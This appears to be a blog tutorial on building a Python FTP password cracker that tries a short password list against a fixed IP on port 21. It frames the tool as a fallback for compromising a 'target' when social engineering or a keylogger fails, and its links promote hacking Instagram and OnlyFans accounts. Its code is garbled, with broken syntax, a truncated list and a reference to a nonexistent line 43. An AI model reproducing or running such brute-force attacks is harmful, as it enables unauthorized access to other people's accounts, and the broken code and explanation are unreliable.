Home » How to Create Our Own Password Cracker

How to Create Our Own Password Cracker

The final thing that we are going to take a look at here and learn how to do is create one of our own password crackers.

This is a great tool to use, especially if you are not able to get social engineering to work, and the target will not add on the keylogger that you are planning to use.

We are able to use this password cracker along with the Python language to get things to work out and to make sure that, when it is successful, we are able to gather the information and the passwords that we want.

Read More: Top 15 Hacking Skills and tools For Beginners.

In particular, we are going to spend some time looking at the steps to create an FTP password cracker.

This is a good one to use because it makes it pretty easy for us to grab onto the passwords that we would like, or to make sure that some of the passwords that we add to our system are going to be as safe and secure as possible.

To help us get started with this, we need to open up our Kali operating system and then make sure that the text editor is all ready to go as well. when all of this is set up, you can type in the following code to help get that FTP password cracker ready to go:

!/usribin/python

import socket

import re

import sys

def connect(username, password);

$ = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

print”(*) Trying”+username+”.”+password

s,connect((‘192.168.1.105’, 21))

data = s.recv(1024)

s.send(‘USER’ +username+ Ar\n’)

data = s.recv(1024)

s.send(‘PASS’ + password + ‘\r\n’)

data. s.recv(3)

s.send(‘QUIT\r\n’)

s.close()

return data

username = “NuilByte”

passwords =[“test”, “backup”, “password”, “12345”, “root”, “administrator”, “ftp”, “admin1

for password in passwords:

attempt = connect(username, password)

if attempt == “230”:I

print “[*) Password found:” + password

sys.exit(0)

Note that inside of this, we have imported a few of the Python modules, namely the socket, there, and the sys, and then we created a socket that is meant to connect through port 21 to a specific IP address that you pick.

Then we created a variable for the username and assigned the NullByte to it, and a list that is called passwords was then created.

This contains some of the passwords that are possible and then a loop was used in order to try out all the passwords until it goes through this list without seeing success.

Read More: How To Install Hydra In Kali-Linux [Instagram Hacking]

Now, as you go through this part, you may notice that you are able to make some changes, especially when it comes to the values that are inside of the script.

You can try it out this way the first time to gain some experience with the coding and all that it has to offer.

But then, as you are ready to make your own attack and you have some more familiarity with how this is going to work, it will be easier to make some of these changes and still get the system to work the way that you would like.

When you have had a chance to make some of the changes that you would like to the coding above so that your password cracker works the way that you would like, or even when you have just decided to work with the code above, it is time to save it.

The best way to do this is to name it ftpcracker.py and then give yourself all of the right permissions so that you can run this cracker.

Read More: How To Hack Instagram Using Kali Linux 2022

If you do get a match with this to a password, then on line 43 that password is going to show up.

If you do not get a match to a password with all of this, then that line is going to stay empty.

Most hackers are going to at least try to get the passwords that you use to your computer and to other important accounts that you have.

Read More: How To Hack OnlyFans Account In 2022?

It is worth it because often, people do not add in the right protections around their passwords, and this is an easy method for the hacker to gather up the information that they would like.

As an ethical hacker, you should try these out on your system as well to see if it is possible for the hacker to gather that information about you or not.

Recommended For You

Leave a Reply

Your email address will not be published.